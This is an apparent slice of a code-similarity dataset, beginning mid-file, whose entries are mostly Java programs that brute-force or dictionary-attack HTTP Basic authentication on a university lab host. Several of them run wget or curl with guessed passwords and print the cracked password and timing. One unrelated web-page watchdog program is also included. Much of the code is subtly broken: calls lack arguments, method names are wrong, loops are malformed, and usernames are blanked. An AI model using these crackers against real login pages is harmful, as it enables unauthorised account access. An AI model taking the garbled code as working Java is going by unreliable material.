{\n for (int i1 = 0; i1\ \ < 26; i1++)\n {\n s1 = String.valueOf((char)(a[0] + i0))\ \ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \ \ count++;\n\n s1 = String.valueOf((char)(a[0] + i0)) + String.valueOf((char)(a[1]\ \ + i1)).toUpperCase();\n decision(s1);\n count++;\n\n \ \ s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase() +\n \ \ (String.valueOf((char)(a[1] + i1))).toUpperCase();\n decision(s1);\n\ \ count++;\n\n s1 = (String.valueOf((char)(a[0] + i0))).toUpperCase()\ \ + String.valueOf((char)(a[1] + i1));\n decision(s1);\n \ \ count++;\n }\n }\n }\n\n \n public void decision(String\ \ s1)\n {\n if (find(s1) == 200)\n {\n stopTime = System.currentTimeMillis();\n\ \ runTime = stopTime - startTime;\n System.out.println(\"***************************************\"\ );\n System.out.println(\"\\nAttack successfully\");\n System.out.println(\"\ \\nPassword is: \" + s1);\n System.out.println(\"\\nThe contents of the\ \ Web site: \");\n displayContent(s1);\n System.out.println(\"\ \\nTime taken crack: \" + runTime + \" millisecond\");\n System.out.println(\"\ \\nNumber of attempts: \" + count);\n System.out.println();\n\n \ \ System.exit(0);\n }\n }\n \n \n public int find(String s1)\n\ \ {\n int responseCode = 0;\n try\n {\n url = new URL(\"\ http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection = (HttpURLConnection)url.openConnection();\n\ \n connection.setRequestProperty(\"Authorization\",\" \" + MyBase64.encode(\"\ \" + \":\" + s1));\n\n responseCode = connection.getResponseCode();\n\n\ \ }catch (Exception e)\n {\n System.out.println(e.getMessage());\n\ \ }\n return responseCode;\n }\n\n \n public void displayContent(String\ \ pw)\n {\n BufferedReader bw = null ;\n try\n {\n url\ \ = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n connection =\ \ (HttpURLConnection)url.openConnection();\n\n connection.setRequestProperty(\"\ Authorization\",\" \" + MyBase64.encode(\"\" + \":\" + pw));\n InputStream\ \ stream = (InputStream)(connection.getContent());\n if (stream != null)\n\ \ {\n InputStreamReader reader = new InputStreamReader (stream);\n\ \ bw = new BufferedReader (reader);\n String line;\n\n\ \ while ((line = bw.readLine()) != null)\n {\n \ \ System.out.println(line);\n }\n }\n }\n \ \ catch (IOException e)\n {\n System.out.println(e.getMessage());\n\ \ }\n }\n}\n\n\n\n\n" sentences: - "\n\n\nimport java.text.*; \nimport java.util.*; \nimport java.net.*; \nimport\ \ java.io.*; \n\n \npublic class BruteForce { \n\n public int runProcess(String\ \ urlString,String passwd) { \n\n int returnval = 0;\n MyAuthenticator\ \ auth = new MyAuthenticator(passwd);\n Authenticator.setDefault(auth);\n\ \n\t System.out.println(\"trying passord: \" + passwd);\n try{\n \ \ URL yahoo = new URL(urlString); \n BufferedReader in =\ \ new BufferedReader(new InputStreamReader(yahoo.openStream()));\n \ \ String inputLine;\n while ((inputLine = in.readLine()) != null) {\n\ \t System.out.println(inputLine);\n\t System.out.println(\"passord:\ \ \" + passwd);\n returnval = 1;\n }\n\t in.close();\n\ \ }catch(Exception e){ returnval = 0;}\n return returnval;\n \ \ }\n\n public static void main(String argv[]) { \n\n String[] val =\ \ \n{\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"\ m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"\ z\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"\ M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"\ Z\"};\n\n int l1 = 0;\n\n int l2 = 0;\n\n int l3 = 0;\n 
\n\ \ int retval = 0;\n\n String pwd = \"\";\n\n \n BruteForce\ \ s = new BruteForce(); \n String urlToSearch = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\ ; \n \n for (int a = 0; a < 52; a++) {\n\n l1 = a;\n\n \ \ pwd = val[l1];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd);\ \ \n if (retval > 0) {\n System.exit(0);\n }\n }\n\ \n\n for (int b = 0; b < 52; b++) {\n l1 = b;\n for (int c\ \ = 0; c < 52; c++) {\n\n l2 = c;\n pwd = val[l1]+ val[l2];\n\ \ retval = 0;\n retval = s.runProcess(urlToSearch,pwd); \n\ \ if (retval > 0) {\n System.exit(0);\n }\n \ \ }\n }\n\n\n for (int d = 0; d < 52; d++) {\n l1 = d;\n \ \ for (int e = 0; e < 52; e++) {\n l2 = e;\n for (int\ \ f = 0; f < 52; f++) {\n\n l3 = f;\n\n pwd = val[l1]+\ \ val[l2]+ val[l3];\n retval = 0;\n retval = s.runProcess(urlToSearch,pwd);\ \ \n if (retval > 0) {\n System.exit(0);\n \ \ }\n }\n }\n }\n\n } \n} \n\n" - "\n \n\n public class Base64Converter\n \n \n {\n\n \ \ public static final char [ ] alphabet = {\n 'A', 'B', 'C', 'D', 'E',\ \ 'F', 'G', 'H', \n 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', \n \ \ 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n 'Y', 'Z', 'a', 'b', 'c',\ \ 'd', 'e', 'f', \n 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', \n \ \ 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n 'w', 'x', 'y', 'z', '0',\ \ '1', '2', '3', \n '4', '5', '6', '7', '8', '9', '+', '/' }; \n\n \ \ \n \n\n public static String encode ( String s )\n \n \ \ {\n return encode ( s.getBytes ( ) );\n }\n\n public static\ \ String encode ( byte [ ] octetString )\n \n {\n int bits24;\n\ \ int bits6;\n\n char [ ] out\n = new char [ ( ( octetString.length\ \ - 1 ) / 3 + 1 ) * 4 ];\n\n int outIndex = 0;\n int i = 0;\n\ \n while ( ( i + 3 ) <= octetString.length )\n {\n \n \ \ bits24 = ( octetString [ i++ ] & 0xFF ) << 16; \n bits24 |=\ \ ( octetString [ i++ ] & 0xFF ) << 8; \n bits24 |= ( octetString [\ \ i++ ] & 0xFF ) << 0;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18; \n\ \ out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24\ \ & 0x0003F000 ) >> 12; \n out [ outIndex++ ] = alphabet [ bits6 ];\n\ \ bits6 = ( bits24 & 0x00000FC0 ) >> 6; \n out [ outIndex++\ \ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0000003F );\n \ \ out [ outIndex++ ] = alphabet [ bits6 ]; \n }\n\n if ( octetString.length\ \ - i == 2 )\n {\n \n bits24 = ( octetString [ i \ \ ] & 0xFF ) << 16; \n bits24 |= ( octetString [ i + 1 ] & 0xFF ) <<\ \ 8;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++\ \ ] = alphabet [ bits6 ]; \n bits6 = ( bits24 & 0x0003F000 ) >> 12; \n\ \ out [ outIndex++ ] = alphabet [ bits6 ]; \n bits6 = ( bits24\ \ & 0x00000FC0 ) >> 6; \n out [ outIndex++ ] = alphabet [ bits6 ];\n\n\ \ \n out [ outIndex++ ] = '='; \n }\n else if (\ \ octetString.length - i == 1 )\n {\n \n bits24 = ( octetString\ \ [ i ] & 0xFF ) << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n \ \ out [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24\ \ & 0x0003F000 ) >> 12; \n out [ outIndex++ ] = alphabet [ bits6 ];\n\ \n \n out [ outIndex++ ] = '='; \n out [ outIndex++\ \ ] = '='; \n }\n\n return new String ( out );\n }\n\n \n\ \ \n}\n\n\n" - "\nimport java.io.*;\nimport java.net.*;\n\npublic class BruteForce\n{\n\n public\ \ static void main(String args[])\n {\n StringWriter sw = new StringWriter();\n\ \ PrintWriter pw = new PrintWriter();\n int flag=1;\n String[] letter\ \ = {\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"\ M\",\"N\",\n \"O\",\"P\",\"Q\",\"R\",\"T\",\"U\",\"V\"\ ,\"W\",\"X\",\"Y\",\"Z\",\"a\",\"b\",\"c\",\n \"d\",\"\ 
e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\n\ \ \"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"\ ,\"\"};\n\n String urlString = new String(\"http://sec-crack.cs.rmit.edu./SEC/2/\"\ );\n String thePassword= new String();\n stime = System.currentTimeMillis();\n\ System.out.println(\"\");\n for(int i=0; i<letter.length;i++)\n {\n \ \ for(int j=0; j<letter.length; j++)\n {\n for(int k=0;flag==1 &&\ \ k<letter.length; k++)\n {\n try {\n URL url = new\ \ URL (urlString);\n thePassword=letter[i].trim()+letter[j].trim()+letter[k].trim();\n\ \n String userPassword = \"\" + \":\" + thePassword;\n\n \ \ String encoding = new url.misc.BASE64Encoder().encode(userPassword.getBytes());\n\ \ URLConnection uc = url.openConnection();\n uc.setRequestProperty(\"\ Authorization\", \" \" + encoding);\n InputStream content = (InputStream)uc.getContent();\n\ \ endtime = System.currentTimeMillis();\n BufferedReader\ \ in =\n new BufferedReader (new InputStreamReader (content));\n\ \ String line;\n while ((line = in.readLine()) != null)\ \ {\n pw.println (line);\n }\n flag=0;\n \ \ System.out.println(\"process time is : \" +(endtime-stime)/1000 +\" seconds.\"\ );\n }catch (MalformedURLException e) {\n\n flag=1;\n \ \ }catch (IOException e) {\n\n flag=1;\n }\n }\n\ \ if(flag==0)\n break;\n else\n System.out.println(\"\ letter j ->\"+ letter[j]+\" elapsed\");\n }\n if(flag==0)\n \ \ break;\n else\n System.out.println(\"letter i ->\"+ letter[i]+\"\ \ elapsed\");\n }\n System.out.println(\"content is \"+ sw.toString());\n\ \ }\n }" - source_sentence: "import java.io.*;\nimport java.net.*;\nimport java.net.HttpURLConnection;\n\ import javax.net.*;\nimport java.security.cert.*;\n\npublic class Dictionary\n\ {\n\tpublic static void main(String[] args)\n\t{\n\t\tBufferedReader in = null;\n\ \t\tboolean found = true;\n\t\tString word = null;\n\t\tString cmd = null;\n\t\ \tRuntime run = Runtime.getRuntime();\n\t\tProcess pro = null;\n\t\tBufferedReader\ \ inLine = null;\n\n\n\n\t\tString str = null;\n\t\tURLConnection connection =\ \ null;\n\n\t\ttry\n\t\t{\n\t\t\tFileReader reader = new FileReader(\"words\"\ );\n\t\t\tin = new BufferedReader(reader);\n\t\t\tSystem.out.println(\" cracking....\"\ );\n\t\t\t\n\t\t\t{\n\t\t\t\tfound = true;\n\t\t\t\tword = new String(in.readLine());\n\ \n\t\t\t\tcmd = \"wget --http-user= --http-passwd=\"+word +\" http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\ ;\n\n\t\t\t\tpro = run.exec(cmd);\n\t\t\t\tinLine = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\ \n\n\t\t\t\tif((str=inLine.readLine())!=null)\n\t\t\t\t{\n\n\t\t\t\t\twhile ((str=inLine.readLine())!=null)\n\ \t\t\t\t\t{\n\t\t\t\t\t\tif (str.endsWith(\"Required\"))\n\t\t\t\t\t\t{\n\n\t\t\ \t\t\t\t\tfound = false;\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\t\t\t\t}\n\n\n\n\n\n\n\ \t\t\t\trun.gc();\n\t\t\t}\n\t\t\twhile (!found);\n\n\n\n\n\n\t\t}\n\t\tcatch\ \ (FileNotFoundException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n\t\ \tcatch (IOException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n \ \ catch (NullPointerException ex)\n {\n System.out.println(word);\n\ \ }\n\t\tfinally\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif (in!= null)\n\t\ \t\t\t{\n\t\t\t\t\tin.print();\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch (IOException e)\ \ {}\n\t\t}\n\t\tif (found == true)\n\t\t\tSystem.out.println(\"The password is\ \ :\" + word);\n else\n System.out.println(\"NOT FOUND!\");\n\ \t}\n}" sentences: - "\n\nimport java.misc.BASE64Encoder;\nimport java.misc.BASE64Decoder;\nimport\ \ 
java.io.*;\nimport java.net.*;\nimport java.util.*;\n\n\n\npublic class Dictionary\ \ {\n \n public Dictionary(String url, String dictionaryFile) {\n try{\n\ \ this.url = url;\n this.dictionaryPath = dictionaryFile;\n InputStream\ \ fis = new FileInputStream(this.dictionaryPath);\n dict = new BufferedReader(new\ \ InputStreamReader(fis));\n\n }catch(IOException ioe){\n System.out.println(\"\ Error opening dictionary file:\\n\" +ioe);\n }\n }\n\n\n \n private String\ \ url = null;\n \n private String dictionaryPath = null;\n \n private BufferedReader\ \ dict = null;\n \n private int attempts = 0;\n \n private int passwordSize\ \ = 3;\n \n public void setPasswordSize(int size){\n this.passwordSize\ \ = size;\n }\n \n public String getNextPassword()throws IOException{\n\n \ \ String line = dict.readLine();\n\n while(line!=null&&line.length()!=this.passwordSize\ \ )\n line = dict.readLine();\n\n return line;\n }\n \n public String\ \ crackPassword(String user) throws IOException, MalformedURLException{\n URL\ \ url = null;\n URLConnection urlConnection = null;\n String outcome = null;\n\ \ String authorization = null;\n String password = null;\n BASE64Encoder\ \ b64enc = new BASE64Encoder();\n InputStream content = null;\n BufferedReader\ \ in = null;\n\n\n while(!\"HTTP/1.1 200 OK\".equalsIgnoreCase(outcome)){\n\ \n url = new URL(this.url);\n urlConnection = url.openConnection();\n\ \ urlConnection.setDoInput(true);\n urlConnection.setDoOutput(true);\n\ \n\n urlConnection.setRequestProperty(\"GET\", url.getPath() + \" HTTP/1.1\"\ );\n urlConnection.setRequestProperty(\"Host\", url.getHost());\n password\ \ = getNextPassword();\n if(password == null)\n return null;\n \ \ System.out.print(password);\n authorization = user + \":\" + password;\n\ \n\n urlConnection.setRequestProperty(\"Authorization\", \" \"+ b64enc.encode(authorization.getBytes()));\n\ \n\noutcome = urlConnection.getHeaderField(null); \n\n\n\n this.attempts\ \ ++;\n urlConnection = null;\n url = null;\n \n if(this.attempts%51\ \ == 0)\n for(int b = 0; b < 53;b++)\n System.out.print(\"\\b\ \ \\b\");\n else\n System.out.print(\"\\b\\b\\b.\");\n\n\n }\n\ \ return password;\n }\n \n public int getAttempts(){\n return this.attempts;\n\ \ }\n public static void main (String[] args) {\n if(args.length != 3){\n\ \ System.out.println(\"usage: java attacks.Dictionary <url crack: e.g. http://sec-crack.cs.rmit.edu./SEC/2/>\ \ <username: e.g. > <dictionary: e.g. 
/usr/share/lib/dict/words>\");\n System.exit(1);\n\ \ }\n\n Dictionary dictionary1 = new Dictionary(args[0], args[2]);\n \ \ try{\n Calendar cal1=null, cal2=null;\n cal1 = Calendar.getInstance();\n\ \ System.out.println(\"Cracking started at: \" + cal1.getTime().toString());\n\ \ String password = dictionary1.crackPassword(args[1]);\n if(password\ \ != null)\n System.out.println(\"\\nPassword is: \"+password);\n \ \ else\n System.out.println(\"\\nPassword could not retrieved!\");\n \ \ cal2 = Calendar.getInstance();\n System.out.println(\"Cracking finished\ \ at: \" + cal2.getTime().toString());\n Date d3 = new Date(cal2.getTime().getTime()\ \ - cal1.getTime().getTime());\n System.out.println(\"Total Time taken crack:\ \ \" + (d3.getTime())/1000 + \" sec\");\n System.out.println(\"Total attempts\ \ : \" + dictionary1.getAttempts());\n\n }catch(MalformedURLException mue){\n\ \ mue.printStackTrace();\n }\n\n catch(IOException ioe){\n ioe.printStackTrace();\n\ \ }\n }\n}" - "import java.io.*;\nimport java.net.*;\nimport java.security.*;\nimport java.math.*;\n\ import java.*;\nimport java.util.*;\n\n\npublic class BruteForce\n{\n public\ \ static void main (String args[]) throws Exception {\n\tString retVal = null,\ \ StatusCode = \"HTTP/1.1 200 OK\";\n int found = 0, count = 0, ctrl = 0, flag\ \ = 0;\n\n\n stime = System.currentTimeMillis();\n char[] c =\ \ new char[3];\n System.out.println(\"Cracking password by Brute Force...\"\ );\n\n\t for(int i=65; ((i<123) && (found == 0)); i++)\n\t {\n\t \ \ for(int j=65; ((j<123) && (found == 0)); j++)\n\t {\n\t for (int\ \ k=65; ((k<123) && (found == 0)); k++)\n\t {\n try {\n\ \ if (ctrl == 0) {\n c[0] = '\\0';\n \ \ c[1] = '\\0';\n } else if ((ctrl == 1)\ \ && (flag == 0)) {\n c[0] = '\\0';\n }\n\ \ c[2] = (char)(k);\n\n\t \n \ \ URL yahoo = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\");\n \ \ URLConnection yc = yahoo.openConnection();\n\n \ \ \n String authString = \":\" + String.valueOf();\n \ \ String auth = new bf.misc.BASE64Encoder().encode(authString.getBytes());\n\ \ yc.setRequestProperty(\"Authorization\", \" \" + auth);\n\ \ count++;\n\n \n BufferedReader\ \ in = new BufferedReader(\n new InputStreamReader(\n\ \ yc.getInputStream()));\n\n \ \ String inputLine;\n while ((inputLine = in.readLine())\ \ != null){\n System.out.println(inputLine);\n \ \ etime = System.currentTimeMillis();\n \ \ System.out.println(\"Password found -- \" + String.valueOf());\n \ \ System.out.println(\"Time used = \" + ((etime - stime)/1000)\ \ + \" sec\");\n System.out.println(\"# of attempt =\ \ \" + count);\n System.out.println(\"End of cracking!\"\ );\n found = 1;\n }\n \ \ in.print();\n\n\t } catch (Exception ex) {}\n\t }\n\t\ \ ctrl = 1;\n c[1] = (char)(j);\n }\n \ \ ctrl = 2;\n flag = 1;\n c[0] = (char)(i);\n }\n\ \ if (found == 0){\n System.out.println(\"Sorry, password found.\"\ );\n System.out.println(\"# of attempt = \" + count);\n System.out.println(\"\ End of cracking!\");\n }\n }\n}" - "\n\nimport java.net.*;\nimport java.io.*;\n\nimport java.*;\nimport java.util.*;\n\ \npublic class Dictionary {\n\n private static String commandLine = \"curl http://sec-crack.cs.rmit.edu./SEC/2/index.php\ \ -I -u :\";\n private String password; \n private String previous;\ \ \n private String url; \n private int startTime;\n\ \ private int endTime;\n private int totalTime;\n private float averageTime;\n\ \ private boolean finish;\n private Process curl;\n private BufferedReader\ \ bf, responseLine;\n\n public Dictionary() {\n\n first();\n finish = true;\ \ \n 
previous = \"\"; \n\ \ Runtime run = Runtime.getRuntime();\n startTime =new Date().getTime(); \ \ \n int i=0;\n try {\n try {\n bf = new BufferedReader(new FileReader(\"\ words\"));\n }\n catch(FileNotFoundException notFound) {\n bf = new BufferedReader(new\ \ FileReader(\"/usr/share/lib/dict/words\"));\n }\n\n while((password = bf.readLine())\ \ != null) {\n if(password.length()>3) password = password.substring(0,3);\n\ \ if(previous.equals(password)) ;\n else {\n previous = password;\n \ \ url = commandLine+password;\n curl= run.exec(url); \n\ \ responseLine=new BufferedReader(new InputStreamReader(curl.getInputStream()));\n\ \ \n if(responseLine.readLine().substring(9,12).equals(\"200\")) break;\n\ \ }\n }\n }\n catch(IOException ioe) {\n System.out.println(\"\\n IO\ \ Exception! \\n\");\n System.out.println(\"The current url is:\"+ url);\n\ \ System.out.println(\"The current trying password is:\"+password);\n finish=false;\n\ \ }\n\n endTime = new Date().getTime(); \n totalTime = (endTime-startTime)/1000;\n\ \ System.out.println(\" The response time is:\"+ totalTime + \" seconds\\\ n\");\n if(finish) {\n System.out.println(\" The password for is:\"+ password);\n\ \ try {\n savePassword(password, totalTime);\n }\n catch (IOException\ \ ioec) {\n System.out.println(\" not save the password file Dictionary_pwd.txt\ \ \");\n }\n }\n }\n\n\n public void savePassword(String passwdString, int\ \ time) throws IOException {\n DataOutputStream outputStream = new DataOutputStream(new\ \ FileOutputStream(\"Dictionary_pwd.txt\"));\n outputStream.writeChars(\"The\ \ password is:\");\n outputStream.writeChars(passwdString+\"\\n\");\n outputStream.writeChars(\"\ The response time is: \");\n outputStream.writeChars(sw.toString(time));\n outputStream.writeChars(\"\ \ seconds\\n\");\n outputStream.close();\n }\n\n public void first() {\n\n\ \ System.out.println(\"\\n\\n----------------------------------------------\"\ );\n System.out.println(\" Use curl command and dictionary \");\n System.out.println(\"\ \ Brute Force the password for user \");\n System.out.println(\"----------------------------------------------\"\ );\n }\n\n public static void main(String[] args) {\n new Dictionary();\n\ \ } \n}\n" - source_sentence: "\n\nimport java.net.*;\nimport java.io.*;\nimport java.io.BufferedReader;\n\ import java.io.InputStream;\nimport java.io.InputStreamReader;\nimport java.io.IOException;\n\ import java.io.FileInputStream;\nimport java.io.FileNotFoundException;\nimport\ \ java.util.*;\nimport java.*;\n\n\npublic class Dictionary {\n public static\ \ void main(String[] args) throws Exception {\n String pass;\n int\ \ attempt = 0;\n String fileName = \"words.txt\", line;\n BufferedReader\ \ reader;\n Dictionary dict = new Dictionary();\n boolean flag=false;\n\ \n System.out.println(System.currentTimeMillis()/1000);\n\n try{\n\ \ reader = new BufferedReader(new InputStreamReader(new FileInputStream(fileName)));\n\ \ while (!flag)\n {\n try{\n line = reader.readLine();\n\ \ attempt++;\n URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\"\ );\n URLConnection yc = url.openConnection();\n pass\ \ = \":\" + line;\n String password = new url.misc.BASE64Encoder().encode(pass.getBytes());\n\ \ yc.setRequestProperty(\"Authorization\",\" \"+password);\n \ \ BufferedReader in = new BufferedReader(new InputStreamReader(yc.getInputStream()));\n\ \ String inputLine;\n while ((inputLine = in.readLine())\ \ != null)\n System.out.println(inputLine);\n \ \ in.close();\n System.out.println(pass);\n flag=true;\n\ \ 
System.out.println(System.currentTimeMillis()/1000); \n \ \ System.out.println(\" of attempt: \"+attempt);\n System.exit(0);\n\ \ }catch(IOException e){\n \n }\n \ \ } \n }catch(FileNotFoundException e){\n System.out.println(\"\ File not found\");\n\n }\n }\n}" sentences: - "import java.io.*;\nimport java.net.*;\nimport java.util.*;\n\npublic class Watchdog\n\ {\n\tpublic static void main(String args[])\n\t{\n\t\t\n\t\tString mainLink=\"\ http://www.cs.rmit.edu./students/\";\n\t\tString sender = \"@cs.rmit.edu.\";\n\ \t\tString recipient = \"<webtech@acuneeds.>\";\n\t\tString hostName = \"yallara.cs.rmit.edu.\"\ ;\n\t\tint delay = 86400000;\n\n\t\ttry\n\t\t{\n\t\t\tint imgSrcIndex, imgSrcEnd;\n\ \t\t\tString imgLink;\n\t\t\tVector imageList = new Vector();\n\t\t\tHttpURLConnection\ \ imgConnection;\n\t\t\tURL imgURL;\n\n\t\t\t\n\t\t\tEmailClient email = new EmailClient(sender,\ \ recipient, hostName);\n\n\t\t\t\n\t\t\tURL url=new URL(mainLink);\n\t\t\tHttpURLConnection\ \ connection = (HttpURLConnection) url.openConnection();\n\n\t\t\tBufferedReader\ \ webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));\n\ \n\t\t\t\n\t\t\tFileWriter fwrite = new FileWriter(\"local.txt\");\n\t\t\tBufferedWriter\ \ writefile = new BufferedWriter(fwrite);\n\n\t\t\tString line=webpage.readLine();\n\ \n\t\t\twhile (line != null)\n\t\t\t{\n\t\t\t\t\n\t\t\t\twritefile.write(line,0,line.length());\n\ \t\t\t\twritefile.newLine();\n\n\t\t\t\t\n\t\t\t\tline = line.toLowerCase();\n\ \t\t\t\timgSrcIndex=line.indexOf(\"src\");\n\n\t\t\t\tif(imgSrcIndex!=-1)\n\t\t\ \t\t{\n\t\t\t\t\t\n\t\t\t\t\timgLink = line.substring(imgSrcIndex+3);\n\t\t\t\t\ \timgSrcIndex=imgLink.indexOf(\"\\\"\");\n\t\t\t\t\timgLink = imgLink.substring(imgSrcIndex+1);\n\ \t\t\t\t\timgSrcEnd = imgLink.indexOf(\"\\\"\");\n\t\t\t\t\timgLink = imgLink.substring(0,imgSrcEnd);\n\ \n\t\t\t\t\t\n\t\t\t\t\tif (imgLink.startsWith(\"http\"))\n\t\t\t\t\t{\n\t\t\t\ \t\t\timgURL = new URL(imgLink);\n\t\t\t\t\t\timgConnection = (HttpURLConnection)\ \ imgURL.openConnection();\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\ {\n\t\t\t\t\t\timgURL = new URL(mainLink);\n\t\t\t\t\t\timgURL = new URL(imgURL,\ \ imgLink);\n\t\t\t\t\t\timgConnection = (HttpURLConnection) imgURL.openConnection();\n\ \t\t\t\t\t\timgLink = (imgConnection.getURL()).toString();\n\t\t\t\t\t}\n\n\t\t\ \t\t\t\n\t\t\t\t\timageList.add(new ImageFile(imgLink, imgConnection.getContentLength()));\n\ \t\t\t\t\timgConnection.disconnect();\n\t\t\t\t}\n\n\t\t\t\tline = webpage.readLine();\n\ \n\t\t\t}\n\n\t\t\t\n\t\t\twritefile.close();\n\t\t\tfwrite.close();\n\t\t\twebpage.close();\n\ \t\t\tconnection.disconnect();\n\n\t\t\t\n\t\t\tWatchdogThread watchdog = new\ \ WatchdogThread(mainLink, imageList, email, delay);\n\t\t}\n\n\t\tcatch (IOException\ \ ioe)\n\t\t{\n\t\t\t\n\t\t\t\n\t\t\tSystem.out.println(ioe);\n\t\t\tSystem.out.println(\"\ Please run program again.\");\n\t\t\tSystem.exit(0);\n\t\t}\n\n\t}\n\n}\n" - "import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private\ \ String strUserName;\n private String strURL;\n private String strDictPath;\n\ \ private int iAttempts;\n\n \n public Dictionary(String strURL,String\ \ strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName\ \ = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n\ \ }\n \n\n public String getPassword(){\n URL u;\n String result\ \ =\"\";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection\ \ uc;\n String strPassword = new 
String();\n String strEncode;\n \ \ try{\n while (result.compareTo(\"HTTP/1.1 200 OK\")!=0){\n \n\ \ strEncode = PG.getNewPassword();\n u = new URL(strURL);\n\ \ uc = u.openConnection();\n uc.setDoInput(true);\n \ \ uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode\ \ = strUserName + \":\" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n\ \ uc.setRequestProperty(\"Authorization\",\" \" + strEncode);\n \ \ \n result = uc.getHeaderField(0);\n uc = null;\n \ \ u = null;\n iAttempts++;\n }\n\n }\n catch (Exception\ \ me) {\n System.out.println(\"MalformedURLException: \"+me);\n }\n\ \ return(strPassword);\n }\n \n public int getAttempts(){\n return\ \ (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart\ \ = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF\ \ = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println(\"Processing\ \ ... \");\n timeStart = System.currentTimeMillis();\n System.out.println(\"\ Password = \" + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n\ \ System.out.println(\"Total Time Taken = \" + (timeEnd - timeStart) + \" (msec)\"\ );\n System.out.println(\"Total Attempts = \" + BF.getAttempts());\n }\n\ \ else {\n System.out.println(\"[Usage] java BruteForce <URL> <USERNAME>\ \ <Dictionary path>\");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private\ \ char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader\ \ inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n\ \ inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n \ \ catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public\ \ String getNewPassword()\n throws PasswordFailureException{\n try {\n \ \ {\n line = inputFile.readLine();\n }while (line.length() !=\ \ iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException\ \ ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends\ \ RuntimeException {\n\n public PasswordFailureException() {\n }\n}" - "\n\nimport java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class\ \ Dictionary{\n\n private static URL location;\n private static String user;\n\ \ private BufferedReader input;\n private static BufferedReader dictionary;\n\ \ private int maxLetters = 3;\n\n \n\n public Dictionary() {\n \n \ \ Authenticator.setDefault(new MyAuthenticator ());\n\n startTime = System.currentTimeMillis();\n\ \ boolean passwordMatched = false;\n while (!passwordMatched) {\n \ \ try {\n input = new BufferedReader(new InputStreamReader(location.openStream()));\n\ \ String line = input.readLine();\n while (line != null) {\n\ \ System.out.println(line);\n line = input.readLine();\n\ \ }\n input.close();\n passwordMatched = true;\n \ \ }\n catch (ProtocolException e)\n {\n \n \ \ \n }\n catch (ConnectException e) {\n System.out.println(\"\ Failed connect\");\n }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n }\n endTime = System.currentTimeMillis();\n\ \ System.out.println(\"Total Time: \"+cad.concat(Math.toString(endTime -\ \ startTime)));\n }\n\n \n\n private char[] nextPassword() {\n String\ \ password = new String();\n try {\n password = dictionary.readLine();\n\ \ while (password.length() > maxLetters) {\n password = dictionary.readLine();\n\ \ }\n }\n catch (IOException e) {\n e.printStackTrace();\n\ \ System.exit(-1);\n }\n\n return password.toCharArray();\n \ \ }\n\n\n \n\n public static void main(String args[]) {\n if (args.length\ \ != 3) {\n 
